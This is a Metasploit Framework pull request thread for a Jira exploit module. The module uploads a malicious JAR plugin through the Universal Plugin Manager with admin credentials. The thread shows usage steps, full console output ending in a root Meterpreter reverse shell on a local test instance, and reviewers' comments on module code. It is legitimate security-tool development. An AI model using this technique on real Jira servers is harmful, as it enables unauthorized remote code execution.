Add Jira Authenticated Plugin Upload Module
rapid7/metasploit-framework pull request #9609
Opened 2018-02-22 16:27 UTC by dubfr33

Add Jira Authenticated Plugin Upload Module

The module executes a payload on Atlassian Jira via the Universal Plugin Manager(UPM). Any
user that has successfully authenticated to Jira and has access to the UPM (typically the admin account) can upload a Java servlet in the form of a JAR archive to achieve code execution. 

## Test Environment Setup

- First, build the Atlassian SDK environment. Instructions can be found below:

    - Windows:
    https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/
    - Linux/Mac:
https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/

- Next, create a shell Jira plugin and launch the SDK. Instructions can be found below:

    - https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/

Once these steps are completed you should be able to browse to localhost:2990/jira/ to confirm successful deployment. The default credentials are admin:admin.

## Verification

- [ ] Install Atlassian SDK/Jira environment
- [ ] Browse to localhost:2990/jira/ to confirm successful deployment
- [ ] msfconsole -q
- [ ] use exploit/multi/http/jira_plugin_upload
- [ ] show options
- [ ] set rhost 127.0.0.1
- [ ] set rport 2990
- [ ] check
- [ ] exploit

## Example Output
```
msf > use exploit/multi/http/jira_plugin_upload
msf exploit(multi/http/jira_plugin_upload) > show options

Module options (exploit/multi/http/jira_plugin_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  admin            yes       The password for the specified username
   HttpUsername  admin            yes       The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /jira/           yes       The base URI to Jira
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Java Universal

msf exploit(multi/http/jira_plugin_upload) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(multi/http/jira_plugin_upload) > set rport 2990
rport => 2990
msf exploit(multi/http/jira_plugin_upload) > check

[*] Server accepted the credentials, user has access to plugin manager!
[*] 127.0.0.1:2990 The target appears to be vulnerable.
msf exploit(multi/http/jira_plugin_upload) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Retrieving Session ID and XSRF token...
[*] Attempting to upload IomGrXWU
[*] Successfully uploaded IomGrXWU
[*] Executing IomGrXWU
[*] Deleting IomGrXWU
[*] Sending stage (53837 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:34056) at 2018-02-22 11:20:54 -0500

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(multi/http/jira_plugin_upload) > 
```

2018-02-22 21:41 UTC, wvu-r7 commented
Cool!

2018-02-24 19:44 UTC, h00die commented
Please add module documentation.  Here is the template: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md

2018-02-25 19:18 UTC, dubfr33 commented
Added module documentation. Let me know if there's anything else I need to add/change!

2018-02-25 20:04 UTC, h00die requested changes
Just a few quick notes. Still need to go over it more, but have other things to do ATM. I'll check more later

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +This module uses a POST request against against the Atlassian Jira Universal Plugin Manager (UPM) to upload a malicious Java servlet in the form of a JAR archive. Once uploaded the module executes th
Remove duplicate against

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +7. Validate options: ```show options```
Can be removed

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +5. Do: ```set rhost 127.0.0.1```
Change the IP to [IP]

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +msf exploit(multi/http/jira_plugin_upload) > show options
You can remove the show options command and output here

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +Attempting to exploit with bad credentials:
I think you can remove this section since you've already showed it working and a bad chrck

2018-02-25 20:04 UTC, h00die commented on documentation/modules/exploit/multi/http/jira_plugin_upload.md
> +Attempting to exploit with bad URI and/or victim IP:
I think you can remove this as

2018-02-25 20:04 UTC, h00die commented on modules/exploits/multi/http/jira_plugin_upload.rb
> +        OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])
If the default rport is 2990, I think it should have the option set as the default

2018-02-25 20:04 UTC, h00die commented on modules/exploits/multi/http/jira_plugin_upload.rb
> +    if res.code == 302
Check res isn't nil first.
```if res and res.code ==``` ...

2018-02-25 20:04 UTC, h00die commented on modules/exploits/multi/http/jira_plugin_upload.rb
> +      'vars_get' => {
Not needed

2018-02-25 20:04 UTC, h00die commented on modules/exploits/multi/http/jira_plugin_upload.rb
> +      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + "#{good_sid}",
Why not template the whole line?

2018-02-26 16:13 UTC, dubfr33 commented
Made recommended changes to the documentation and module

2018-02-26 19:13 UTC, jmartin-r7 commented
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviews.

Closing based on the this requirement, please do resubmit from a unique branch.

2018-02-26 19:13 UTC, closed without merging